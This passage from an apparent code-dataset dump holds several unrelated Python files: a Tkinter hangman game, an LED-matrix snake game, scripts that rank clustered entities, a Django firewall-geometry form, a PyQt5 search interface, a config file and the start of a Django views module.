else:\n self.misses.append(item)\n index = 0\n for x in st.ALPHABET:\n self.a.update({x: index})\n index += 1\n self.abc[self.a[item]].config(state=s, bg=bg, disabledforeground=dfg)\n c = 7 - len(self.misses)\n if c == 0:\n c = 7\n self.counter.set(f'{c}')\n self.count.config(fg=st.color[f'{c}'])\n self.draw_word()\n self.game_status()\n\n def set_welcome(self):\n self.welcome.pack_forget()\n sleep(0.6)\n\n self.mainframe.pack(fill=BOTH, expand=True)\n\n def set_back(self):\n self.mainframe.pack_forget()\n sleep(0.4)\n self.welcome.pack(fill=BOTH, expand=True)\n # noinspection PyBroadException\n # try:\n # self.master_2.destroy()\n # except NotImplementedError:\n # pass\n self.level[0].config(state=NORMAL)\n self.level[1].config(state=NORMAL)\n self.level[2].config(state=DISABLED)\n self.first_last.clear()\n\n def set_secret_word(self):\n \"\"\"Sets the secret word by the user choice\"\"\"\n self.guesses.clear()\n self.misses.clear()\n self.char = ''\n search = self.prompt.get()\n lang = st.C_EN\n\n if search.lower() == 'random':\n from random import choice\n search_query = choice(lang)\n else:\n search_query = search.lower()\n\n # Opens available words from csv file\n try:\n word = st.open_csv(search_query, self.level_status).upper()\n if word in self.s_w_list:\n word = st.open_csv(search_query, self.level_status).upper()\n self.secret_word.set(word)\n for x in word:\n if x == word[0] or x == word[len(word) - 1]:\n if x.upper() in self.first_last:\n continue\n self.first_last.append(x.upper())\n if self.level_status == 1:\n self.sorted = st.sort(word)\n else:\n self.sorted = st.sort(word, True)\n self.draw_word()\n self.banner_text.set(search_query.capitalize())\n except NotImplementedError:\n pass\n\n def set_command(self, text):\n \"\"\"Sets command for buttons\"\"\"\n command = None\n if text == 'start':\n command = self.set_start_button\n elif text == 'stop':\n command = self.set_stop_button\n elif text == 'exit':\n command = self.destroy_all\n elif text == 'ENTER':\n command = self.set_welcome\n # elif text == 'english':\n # command = self.set_language\n elif text == 'Back':\n command = self.set_back\n return command\n\n # def set_language(self):\n # \"\"\"Method for change the categories between english and french\"\"\"\n # if self.choose.cget('text').lower() == 'english':\n # self.choose.config(text='Francais')\n # self.lang = 'ENG'\n # elif self.choose.cget('text').lower() == 'francais':\n # self.choose.config(text='English')\n # self.lang = 'FRA'\n\n def start_stop_action(self, text):\n \"\"\"Start and stop buttons common actions\"\"\"\n bc, ba, bb, dfg, s, s_2, s_3 = None, None, None, None, None, None, None\n sbg, stbg = None, None\n if text == 'start':\n if self.level_status == 3:\n self.clock_text.set('Timer')\n for x in range(3):\n if self.level[x].cget('state') == 'disabled':\n continue\n else:\n self.level[x].grid_forget()\n bc = st.color['fg']\n ba = st.color['fg']\n bb = st.color['bg_abc_a']\n dfg = st.color['bg']\n s = DISABLED\n s_2 = NORMAL\n s_3 = NORMAL\n sbg = st.color['fg']\n stbg = st.color['bg_stop']\n if text == 'stop':\n self.first_last.clear()\n self.sorted = ''\n self.banner_text.set('')\n self.clock_text.set('Clock')\n self.running = False\n # self.choose.place(relx=0.67, rely=0.23, x=0, y=0, anchor='se')\n r = 0\n for x in range(3):\n self.level[x].grid(row=r, column=0, sticky='news', pady=3)\n r += 1\n bc = st.color['bg_cat_a']\n ba = st.color['fg']\n bb = st.color['bg']\n dfg = st.color['fg']\n s = NORMAL\n s_2 = DISABLED\n s_3 = DISABLED\n sbg = st.color['bg_start']\n stbg = st.color['fg']\n self.start.config(state=s, bg=sbg)\n self.stop.config(state=s_2, bg=stbg)\n self.total = 0\n self.score_text.set('0\\n0')\n for a in range(8):\n if self.category[a].cget('text').lower() == self.prompt.get():\n self.category[a].config(state=DISABLED, bg=ba)\n else:\n self.category[a].config(state=s, bg=bc)\n for i in range(0, 26):\n if self.level_status == 1:\n if self.abc[i].cget('text') in self.first_last:\n self.abc[i].config(bg=st.color['bg'], state=DISABLED,\n disabledforeground=st.color['dfg_abc_g'])\n else:\n self.abc[i].config(bg=bb, disabledforeground=dfg, state=s_3)\n else:\n self.abc[i].config(bg=bb, disabledforeground=dfg, state=s_3)\n\n def set_start_button(self):\n \"\"\"Sets start button action\"\"\"\n print(\"This is working\")\n self.time_left.set(st.DEFAULT_GAP)\n self.running = True\n self.counter.set('7')\n self.set_secret_word()\n self.quit.config(state=DISABLED)\n self.back.config(state=DISABLED)\n self.start_stop_action('start')\n # self.choose.place_forget()\n # noinspection PyBroadException\n # try:\n # if self.master_2:\n # self.master_2.destroy()\n # except NotImplementedError:\n # pass\n\n def set_stop_button(self):\n \"\"\"Sets stop button action\"\"\"\n self.word_text.set('Choose your category')\n self.counter.set('')\n self.quit.config(state=NORMAL)\n self.back.config(state=NORMAL)\n self.start_stop_action('stop')\n self.timer_text.set(strftime(\"%H:%M\"))\n\n def set_category(self, text):\n \"\"\"Category buttons function\"\"\"\n self.prompt.set(text)\n for a in range(8):\n if self.category[a].cget('text').lower() == text:\n self.category[a].config(state=DISABLED, bg=st.color['fg'])\n else:\n self.category[a].config(state=NORMAL, bg=st.color['bg_cat_a'])\n\n def set_level(self, text):\n \"\"\"Method for difficulty level\"\"\"\n if text == 'hard':\n self.level_status = 3\n if text == 'medium':\n self.level_status = 2\n if text == 'easy':\n self.level_status = 1\n for x in range(3):\n if self.level[x].cget('text').lower() == text:\n self.level[x].config(state=DISABLED, bg=st.color['fg'])\n else:\n self.level[x].config(state=NORMAL, bg=st.color['bg_level'])\n\n def update(self):\n \"\"\"Master window refresh rate, 1 second\"\"\"\n time_left = self.time_left.get()\n if self.running and time_left and self.level_status == 3:\n minutes, seconds = st.minutes_seconds(time_left)\n self.timer_text.set(\n '{:0>2}:{:0>2}'.format(minutes, seconds)\n )\n self.time_left.set(time_left - 1)\n self.master.after(1000, self.update)\n\n\nif __name__ == '__main__':\n root = Tk(className='Guess Letter v2.0')\n Hangman(root)\n root.mainloop()\n","sub_path":"guess_letter.py","file_name":"guess_letter.py","file_ext":"py","file_size_in_byte":34845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"345072019","text":"#!/usr/bin/env python3\nimport time\nfrom neopixel import *\nimport argparse\nfrom random import randint\nimport threading\nfrom inputs import devices\nfrom inputs import get_gamepad\nfrom random import randint\nfrom matrix_board import Matrix_board\nfrom snake import Snake\nfrom apple import Apple\nfrom powerup import Powerup\n \n# LED strip configuration:\nLED_COUNT = 256 # Number of LED pixels.\nLED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).\n#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).\nLED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\nLED_DMA = 10 # DMA channel to use for generating signal (try 10)\nLED_BRIGHTNESS = 100 # Set to 0 for darkest and 255 for brightest\nLED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\nLED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53\n\ndef powerupSpawner():\n while snake.alive:\n time.sleep(randint(20, 35))\n powerup.spawnPowerup(strip,Color,randint(0, 255),randint(1, 2))\n time.sleep(7)\n powerup.powerup = 0\n strip.setPixelColor(powerup.position, Color(0,0,0))\n strip.show()\n\ndef gamepadEventListener():\n while snake.alive:\n print(\"Listening for events\")\n events = get_gamepad()\n if events[0].code == \"BTN_SOUTH\":\n snake.moveRight()\n\n if events[0].code == \"BTN_WEST\":\n snake.moveUp()\n\n if events[0].code == \"BTN_NORTH\":\n snake.moveLeft()\n\n if events[0].code == \"BTN_EAST\":\n snake.moveDown()\n\ndef snakeMovement():\n while snake.alive:\n if snake.row > -1 and snake.row < 17 and snake.col > -1 and snake.col < 17:\n if apple.isAppleEaten(snake.body):\n print(\"Apple eaten\")\n apple.spawnApple(strip,Color,randint(0, 255))\n snake.increaseSpeed()\n snake.increaseScore()\n snake.movementSnake(strip,Color,board,time,True,0)\n elif powerup.isPowerupEaten(snake.body):\n print(\"Powerup eaten\")\n snake.movementSnake(strip,Color,board,time,False,powerup.powerup)\n powerup.powerup = 0\n else:\n print(\"Moving\")\n snake.movementSnake(strip,Color,board,time,False,0)\n else:\n print(\"Snake dead\")\n snake.alive = False\n board.clearBoard(strip, Color, time)\n board.gameOver(strip, Color, time, snake.score)\n\n print(\"Snake dead\")\n board.clearBoard(strip, Color, time)\n board.gameOver(strip, Color, time, snake.score)\n \n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')\n args = parser.parse_args()\n \n strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)\n strip.begin()\n\n board = Matrix_board(16,16)\n board.createBoard()\n\n snake = Snake(True,3,4,8,0)\n snake.spawnSnake(strip,Color,board)\n\n apple = Apple()\n apple.spawnApple(strip,Color,randint(0, 255))\n\n powerup = Powerup()\n\n\n print(\"*** AVAILABLE DEVICES ***\")\n for device in devices:\n print(device)\n print(\"*************************\")\n\n print ('Press Ctrl-C to quit.')\n if not args.clear:\n print('Use \"-c\" argument to clear LEDs on exit')\n \n try:\n t1 = threading.Thread(target=gamepadEventListener)\n t1.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=snakeMovement)\n t2.start()\n\n t3 = threading.Thread(target=powerupSpawner)\n t3.daemon = True\n t3.start()\n\n\n except KeyboardInterrupt:\n if args.clear:\n board.clearBoard(strip, Color, time)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"582974579","text":"import numpy as np\nimport scipy.spatial.distance\nfrom sklearn.neighbors import KDTree\n\nfrom util import io\n\n\ndef kdTree(entity_names, space):\n inds_to_check = range(0,400,20)\n\n for i in inds_to_check:\n print(entity_names[i])\n tree = KDTree(space, leaf_size=2)\n dist, ind = tree.query([space[i]], k=5)\n ind = ind[0][:]\n for j in ind:\n print(entity_names[j])\n\ndef biggestEucDifference(space1, space2, entity_names):\n dists = []\n for i in range(len(space1)):\n for j in range(len(space2)):\n dists.append(scipy.spatial.distance.euclidean(space1[i], space2[j]))\n dists = np.flipud(np.sort(dists))\n print(\"Biggest diff entities\")\n for i in range(len(dists)):\n print(dists[i], entity_names[i])\n if i == 500:\n break\n\"\"\"\nspace = io.import2dArray(\"../data/movies/nnet/spaces/films200.npy\")\nft_space = io.import2dArray(\"../data/movies/nnet/spaces/mds-nodupeCV1S0 SFT0 allL010010 LR kappa KMeans CA400 MC1 MS0.4 ATS1000 DS800FT BOCFi NT[200]tanh300V1.2L0.npy\")\nentity_names = io.import1dArray(\"../data/movies/nnet/spaces/entitynames.txt\")\nbiggestEucDifference(space, ft_space, entity_names)\n\"\"\"\n# Top_x is the amount of top entities to show. If 0, shows all\n# Cluster_ids are the clusters you want to show the top entities for. If none, then it shows all\ndef getTopEntitiesOnRanking(ranking, entity_names, cluster_names, cluster_length=3, top_x=-1, cluster_ids=None, output=True):\n if cluster_ids is not None:\n ranking = ranking[cluster_ids]\n cluster_names = cluster_names[cluster_ids]\n for i in range(len(cluster_names)):\n cluster_names[i] = cluster_names[i]\n top_entities = []\n top_rankings = []\n for c in range(len(ranking)):\n top_cluster_entities = []\n top_cluster_rankings = []\n sorted_cluster = np.asarray(list(reversed(entity_names[np.argsort(ranking[c])])))\n sorted_rankings = np.asarray(list(reversed(ranking[c][np.argsort(ranking[c])])))\n for e in range(len(sorted_cluster)):\n top_cluster_entities.append(sorted_cluster[e])\n top_cluster_rankings.append(sorted_rankings[e])\n if e == top_x:\n break\n top_entities.append(top_cluster_entities)\n top_rankings.append(top_cluster_rankings)\n if output:\n print(\"Cluster:\", cluster_names[c], \"Entites\", top_cluster_entities)\n #print(\"Cluster:\", cluster_names[c], \"Entites\", top_cluster_rankings)\n return top_entities, top_rankings\n\n\ndata_type = \"movies\"\nfile_name = \"num_stw_num_stw_200_MDS_ndcg_1000_10000_0_rank_50_100_0.0_k-means++_200_kmeans\"\ncluster_names = io.import1dArray(\"../../data_paper/experimental results/chapter 5/\" + data_type + \"/cluster/\" + file_name + \".txt\", \"s\")\nranking = io.import2dArray(\"../../data_paper/experimental results/chapter 5/\" + data_type + \"/cluster/\" + file_name + \"_best_200_rank.npy\", \"s\")\nentity_names = io.import1dArray(\"../../data_paper/experimental results/chapter 5/\" + data_type + \"/entity_names.txt\")\ntop_x = 5\ncluster_length = 3\ncluster_ids = None\n\nnormal_top_entities = getTopEntitiesOnRanking(ranking, entity_names, cluster_names, cluster_length, top_x, cluster_ids)\n\"\"\"\nprint(\"---------------------\")\nfile_name = \"mds-nodupeCV1S0 SFT0 allL010010 LR kappa KMeans CA400 MC1 MS0.4 ATS1000 DS800FT BOCFi NT[200]tanh300V1.2\"\nranking = io.io.import2dArray(\"../data/\" + data_type + \"/nnet/clusters/\" + file_name + \".txt\")\nfinetuned_top_entities = getTopEntitiesOnRanking(ranking, entity_names, cluster_names, cluster_length, top_x, cluster_ids)\n\"\"\"\n\ndef id_from_array(array, name):\n for n in range(len(array)):\n if array[n] == name:\n return n\n print(\"FAILED TO FIND\", name)\n return None\n\n# Must be the full top entities, with numerical values\ndef compareTopEntitiesOnRanking(ranking_1, ranking_2, cluster_names, cluster_length, top_x, output=True, reverse=False,\n from_top=-1):\n\n if from_top == -1:\n from_top = len(ranking_1[0])\n\n\n pos = np.zeros( shape=(len(ranking_1), len(ranking_1[0])))\n for r in range(len(ranking_1)):\n for v in range(len(ranking_1[r])):\n pos[r][v] = v\n\n #Convert the rankings to sorted lists and create empty 1-15,000 array\n sorted_ranking_names1 = np.empty(dtype=\"object\",shape = (len(ranking_1), from_top))\n sorted_ranking1 = np.empty(shape = (len(ranking_1), from_top))\n sorted_ranking1_by2 = np.empty(shape = (len(ranking_1), from_top))\n sorted_pos = np.zeros( shape = (len(ranking_1), from_top))\n\n for c in range(len(ranking_1)):\n sorted_ranking_names1[c] = list(reversed(entity_names[np.argsort(ranking_1[c])]))[:from_top]\n sorted_ranking1[c] = list(reversed(ranking_1[c][np.argsort(ranking_1[c])]))[:from_top]\n sorted_ranking1_by2[c] = list(reversed(ranking_1[c][np.argsort(ranking_2[c])]))[:from_top]\n sorted_pos[c] = list(reversed(pos[c][np.argsort(ranking_1[c])]))[:from_top]\n\n sorted_ranking_names2 = np.empty(dtype=\"object\", shape = (len(ranking_1), from_top))\n sorted_ranking2 = np.zeros(shape = (len(ranking_1), from_top))\n sorted_ranking2_by1 = np.empty(shape = (len(ranking_1), from_top))\n sorted_pos2 = np.zeros( shape = (len(ranking_1), from_top))\n\n for c in range(len(ranking_2)):\n sorted_ranking_names2[c] = list(reversed(entity_names[np.argsort(ranking_2[c])]))[:from_top]\n sorted_ranking2[c] = list(reversed(ranking_2[c][np.argsort(ranking_2[c])]))[:from_top]\n sorted_ranking2_by1[c] = list(reversed(ranking_2[c][np.argsort(ranking_1[c])]))[:from_top]\n sorted_pos2[c] = list(reversed(pos[c][np.argsort(ranking_2[c])]))[:from_top]\n\n\n all_diffs = np.zeros(shape = (len(sorted_ranking1), len(sorted_ranking2[0])))\n\n # Get the diffs between the sorted lists\n for c in range(len(sorted_ranking1)):\n for v in range(len(sorted_ranking1[c])):\n if reverse:\n all_diffs[c][v] = sorted_ranking2[c][v] - sorted_ranking1_by2[c][v]\n else:\n all_diffs[c][v] = sorted_ranking1[c][v] - sorted_ranking2_by1[c][v]\n\n # Sort and include sorted pos\n sorted_diffs = np.zeros(shape = (len(all_diffs), len(all_diffs[0])))\n sorted_names = np.empty(dtype=\"object\", shape = (len(all_diffs), len(all_diffs[0])))\n sorted_diff_pos =np.zeros(shape = (len(all_diffs), len(all_diffs[0])))\n sorted_diff_pos2 = np.zeros(shape = (len(all_diffs), len(all_diffs[0])))\n sorted_names2 = np.empty(dtype=\"object\", shape = (len(all_diffs), len(all_diffs[0])))\n\n\n for d in range(len(all_diffs)):\n sorted_diffs[d] = list(reversed(all_diffs[d][np.argsort(all_diffs[d])]))\n if reverse:\n sorted_names2[d] = list(reversed(sorted_ranking_names2[d][np.argsort(all_diffs[d])]))\n sorted_diff_pos2[d] = list(reversed(sorted_pos2[d][np.argsort(all_diffs[d])]))\n else:\n sorted_names[d] = list(reversed(sorted_ranking_names1[d][np.argsort(all_diffs[d])]))\n sorted_diff_pos[d] = list(reversed(sorted_pos[d][np.argsort(all_diffs[d])]))\n\n\n\n\n if output:\n for s in range(len(sorted_diffs)):\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff scores\", sorted_diffs[s][:top_x])\n if reverse:\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff entities\", sorted_names2[s][:top_x])\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff scores\", sorted_pos2[s][:top_x])\n else:\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff entities\", sorted_names[s][:top_x])\n print(\"Cluster:\", cluster_names[s][:cluster_length], \"Top diff scores\", sorted_pos[s][:top_x])\n\n\n return all_diffs, sorted_diffs\n\n\ndef compareEntityOnCluster(ranking1, ranking2, clusters, entity_names, entity_name=\"\", entity_id=-1, cluster_name=\"\", cluster_id=-1):\n for c in range(len(clusters)):\n if cluster_name in clusters[c]:\n cluster_id = c\n break\n to_compare1 = None\n to_compare2 = None\n if cluster_id != -1:\n to_compare1 = ranking1[cluster_id]\n to_compare2 = ranking2[cluster_id]\n else:\n print(\"NO CLUSTER ID\")\n entity_id = id_from_array(entity_names, entity_name)\n if entity_id is not None and entity_id != -1:\n print(\"ranking1\", entity_name, to_compare1[entity_id])\n print(\"ranking2\", entity_name, to_compare2[entity_id])\n print(\"difference\", entity_name, to_compare1[entity_id] - to_compare2[entity_id])\n else:\n print(\"NO ENTITY ID\")\n\n\ndef getSimilarClusters(cluster_dict_1, cluster_dict_2, trim_amt, file_name, data_type, threshold_for_stopping, threshold_for_stopping_1):\n matching_clusters = np.zeros(len(cluster_dict_1), dtype=np.int32)\n new_cluster_dict_2 = []\n for c in cluster_dict_2:\n new_cluster_dict_2.append(np.flipud(c))\n cluster_dict_2 = None\n cluster_dict_2 = new_cluster_dict_2\n positions = np.zeros(len(cluster_dict_1))\n for c in range(len(cluster_dict_1)):\n print(c)\n lowest_pos = 242343\n lowest_cluster = len(cluster_dict_2)-1\n for n in range(len(cluster_dict_1[c])):\n if n > threshold_for_stopping_1:\n break\n name_to_match = cluster_dict_1[c][n]\n if \":\" in name_to_match:\n name_to_match = name_to_match[:-1]\n for c2 in range(len(cluster_dict_2)):\n for n2 in range(len(cluster_dict_2[c2])):\n if n2 > threshold_for_stopping:\n break\n name_to_match2 = cluster_dict_2[c2][n2]\n if \":\" in name_to_match2:\n name_to_match2 = name_to_match2[:-1]\n if name_to_match == name_to_match2:\n if n2 < lowest_pos:\n lowest_cluster = c2\n lowest_pos = n2\n break\n matching_clusters[c] = lowest_cluster\n positions[c] = lowest_pos\n sorted_matching_indexes = matching_clusters[np.argsort(positions)]\n sorted_orig_indexes = np.asarray(list(range(len(cluster_dict_1))))[np.argsort(positions)]\n print(\"_--------------------------------------------------\")\n print(\"SORTED\")\n print(\"_--------------------------------------------------\")\n lines = []\n for c in range(len(sorted_orig_indexes)):\n line_p1 = \"\"\n for n in cluster_dict_1[sorted_orig_indexes[c]][:trim_amt]:\n line_p1 = line_p1 + n + \" \"\n line_pl2 = \"\"\n for k in cluster_dict_2[sorted_matching_indexes[c]][:trim_amt]:\n line_pl2 = line_pl2 + k + \" \"\n line = line_p1 + \" |||| \" + line_pl2\n lines.append(line)\n print(line)\n io.io.write1dArray(lines, \"../data/\" + data_type + \"/investigate/\" + file_name + str(trim_amt) + \".txt\")\n\"\"\"\ndata_type = \"movies\"\nfile_name = \"mds-nodupeCV1S0 SFT0 allL010010 LR acc KMeans CA400 MC1 MS0.4 ATS500 DS800\"\ncluster_names = np.asarray(dt.import2dArray(\"../data/\" + data_type + \"/cluster/dict/\" + file_name + \".txt\",\"s\"))\nsecond_cluster_name = \"mds-nodupeCV1S0 SFT0 allL010010 LR kappa KMeans CA400 MC1 MS0.4 ATS1000 DS800\"\nsecond_cluster_names = np.asarray(dt.import2dArray(\"../data/\" + data_type + \"/cluster/dict/\" + second_cluster_name + \".txt\",\"s\"))\ntopic_model_names = np.asarray(dt.import2dArray(\"../data/\" + data_type + \"/LDA/names/\" + \"class-all-100-10-all-nodupe.npzDTP0.001TWP0.1NT100.txt\", \"s\"))\n\ntrim_amt = 10\nthreshold_for_stopping = 100\nthreshold_for_stopping_1 = 20\ngetSimilarClusters( topic_model_names, cluster_names, trim_amt, file_name, data_type, threshold_for_stopping, threshold_for_stopping_1)\n\"\"\"\n\"\"\"\nranking1 = dt.import2dArray(\"../data/\" + data_type + \"/rank/numeric/\" + file_name + \".txt\")\nentity_names = dt.import1dArray(\"../data/\" + data_type + \"/nnet/spaces/entitynames.txt\")\ntop_x = 5\ncluster_length = 3\ncluster_ids = None\n#Reverse = False: How far certain moves in A have fallen after being in B\n#Reverse = True: How high certain movies have grown in A after being in B\nreverse = False\nfrom_top = 100\n\nfile_name = \"places NONNETCV5S0 SFT0 allL050kappa KMeans CA200 MC1 MS0.4 ATS2000 DS400 foursquareFT BOCFi NTtanh1 NT1300linear\"\nranking2 = dt.import2dArray(\"../data/\" + data_type + \"/nnet/clusters/\" + file_name + \".txt\")\n\n#compareTopEntitiesOnRanking(ranking1, ranking2, cluster_names, cluster_length, top_x, output=True, reverse=reverse, from_top=from_top)\n\ncompareEntityOnCluster(ranking1, ranking2, cluster_names, entity_names, entity_name=\"house\", cluster_name=\"classical\")\n\"\"\"\n\"\"\"\ndata_type = \"movies\"\nclassify = \"genres\"\nfile_name = \"places100\"\nrepresentation = dt.import2dArray(\"../data/\"+data_type+\"/nnet/spaces/\"+ file_name + \"-\"+classify+\".txt\", \"f\")\nentity_names = dt.import1dArray(\"../data/\" + data_type + \"/classify/\"+classify+\"/available_entities.txt\", \"s\")\n\"\"\"\n\"\"\"\ndef treeImages(loc, names,class_name):\n for n in names:\n copyfile(loc + class_name + \" \" + n + \"CV0\" + \".png\", output_loc + class_name + \" \" + n + \"CV0\" + \".png\")\n \"\"\"\n\"\"\"\nfile_name = \"wines100-\" + classify\nrepresentation = import2dArray(\"../data/\"+data_type+\"/nnet/spaces/\"+ file_name + \".txt\", \"f\")\nentity_names = import1dArray(\"../data/\" + data_type + \"/classify/\"+classify+\"/available_entities.txt\", \"s\")\n\"\"\"\n\"\"\"\ndata_type = \"placetypes\"\nclass_name = \"TravelAndTransport\"\nname1 = \"places NONNETCV5S4 SFT0 allL050kappa KMeans CA100 MC1 MS0.4 ATS2000 DS200 foursquare tdev3\"\nname2 = \"places NONNETCV5S4 SFT0 allL050kappa KMeans CA100 MC1 MS0.4 ATS2000 DS200 foursquare tdev3FT BOCFi IT1300\"\nnames = [name1, name2]\nloc = \"../data/\" + data_type + \"/rules/tree_images/\"\noutput_loc = \"../data/\" + data_type + \"/rules/tree_investigate/\"\ntreeImages(loc, names, class_name)\n\"\"\"\n\ndef topEntities(ranking, ens, id=-1):\n ens = np.asarray(ens)\n ranking = np.asarray(ranking)\n sorted_entities = []\n sorted_values = []\n for r in ranking:\n sorted_entities.append(list(reversed(ens[np.argsort(r)])))\n sorted_values.append(list(reversed(r[np.argsort(r)])))\n if id > -1:\n print(sorted_entities[id])\n print(sorted_values[id])\n else:\n for s in sorted_entities:\n print(s)\n\"\"\"\ndata_type = \"placetypes\"\nfile_name = \"places NONNETCV1S0 SFT0 allL050ndcg KMeans CA200 MC1 MS0.4 ATS2000 DS400 opencycFT BOCFi NTtanh1 NT1300linear3.txt\"\nranking_fn = \"../data/\" + data_type+\"/rules/rankings/\" + file_name\n#ranking = dt.import2dArray(ranking_fn)\nentities = dt.import1dArray(\"../data/\" + data_type + \"/nnet/spaces/entitynames.txt\")\n\n#topEntities(ranking, entities)\n#print(\"------------------------------------------------\")\ncompare_fn = \"places NONNETCV1S0 SFT0 allL050ndcg KMeans CA200 MC1 MS0.4 ATS2000 DS400.txt\"\nranking_fn = \"../data/\" + data_type+\"/rank/numeric/\" + compare_fn\nranking = dt.import2dArray(ranking_fn)\n#topEntities(ranking, entities)\n\"\"\"","sub_path":"src/vis/top_entities_text.py","file_name":"top_entities_text.py","file_ext":"py","file_size_in_byte":14995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283312497","text":"from django import forms\n\nfrom applications.firewalls.models import firewalls\n\n\nclass FirewallsForm(forms.ModelForm):\n\n\tclass Meta:\n\t\tmodel = firewalls\n\n\t\tfields = [\n\t\t\t'geom',\n\t\t\t'type',\n\t\t\t'descript',\n\t\t]\n\t\tlabels = {\n\t\t\t'geom': 'Geometry',\n\t\t\t'type': 'Type of Firewall',\n\t\t\t'descript': 'Description',\n\t\t}","sub_path":"signis_osgis/signis/applications/firewalls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20992457","text":"\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport SearchEngine\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1162, 893)\n\n self.data = SearchEngine.extractPickle()\n\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setGeometry(QtCore.QRect(190, 40, 781, 41))\n self.lineEdit.setObjectName(\"lineEdit\")\n\n f = self.lineEdit.font()\n f.setPointSize(18.2)\n self.lineEdit.setFont(f)\n\n self.pushButton = QtWidgets.QPushButton(self.centralwidget)\n self.pushButton.setGeometry(QtCore.QRect(990, 40, 131, 41))\n self.pushButton.setIcon(QtGui.QIcon(\"Go.png\"))\n self.pushButton.setIconSize(QtCore.QSize(150, 100))\n QtGui.QGuiApplication.processEvents()\n self.labeling = QtWidgets.QLabel(self.centralwidget)\n self.labeling.setGeometry(QtCore.QRect(30, 40, 131, 41))\n w = self.labeling.width()\n h = self.labeling.height()\n pixmap = QtGui.QPixmap(\"Search.png\")\n self.labeling.setPixmap(pixmap.scaled(w, h, QtCore.Qt.KeepAspectRatio)) # setPixmap(QtGui.setPixmap(pixmap))\n self.labeling.setObjectName(\"label\")\n QtGui.QGuiApplication.processEvents()\n\n self.textBrowser = QtWidgets.QTextBrowser(self.centralwidget)\n self.textBrowser.setGeometry(QtCore.QRect(30, 110, 1091, 711))\n self.textBrowser.setObjectName(\"textBrowser\")\n\n\n font = QtGui.QFont()\n font.setPointSize(17)\n self.textBrowser.setFont(font)\n\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1162, 22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.pushButton.clicked.connect(self.buttonClicked)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n\n def buttonClicked(self):\n self.textBrowser.clear()\n query = self.parseQuery()\n QtGui.QGuiApplication.processEvents()\n urlData = self.urlData(query, self.data)\n output = SearchEngine.results(urlData)\n self.textBrowser.setText(output)\n\n def parseQuery(self):\n query = self.lineEdit.text().split()\n return query\n\n def urlData(self, query, data):\n documents = SearchEngine.searchIndex(query, data)\n urlData = SearchEngine.processDocs(documents)\n return urlData\n\n def setImage(self):\n label = QtWidgets.QLabel(self)\n pixmap = QtGui.QPixmap(\"Search.png\")\n label.setPixmap(QtGui.setPixmap(pixmap))\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n","sub_path":"UISearchEngine.py","file_name":"UISearchEngine.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"536029951","text":"# -*- coding: utf-8 -*-\nimport os\n\n\"\"\"\n General configuration.\n\"\"\"\nCWD = os.path.dirname(os.path.abspath(__file__))\n\nRUNTIME_DIR = os.path.join(CWD, 'runtime')\n\nIMAGES_DIR = os.path.join(RUNTIME_DIR, 'images')\nREFRESH_TOKEN_PATH = os.path.join(RUNTIME_DIR, 'refresh_token.txt')\n\nMAX_RECONNECT_RETRIES = 5\n\n\"\"\"\n Command specific configuration.\n\"\"\"\n\n\"\"\"\n /gif\n\"\"\"\nGIFYCAT_SEARCH_URL = 'https://api.gfycat.com/v1test/gfycats/search'\nMAX_GIF_SIZE_IN_MB = int(os.environ.get('ROBORONYA_MAX_GIF_SIZE', '5'))\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"380403010","text":"from django.shortcuts import render, redirect, get_object_or_404, get_list_or_404\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_POST\nfrom .models import Student, Professor, Greeting, Comment, Message\n\ndef index(request):\n professor = Professor.objects.get(pk=1)\n context = {\n 'professor': professor,\n }\n return render(request, 'ssafy5_3/index.html', context)\n\ndef messages(request):\n context = {\n\n 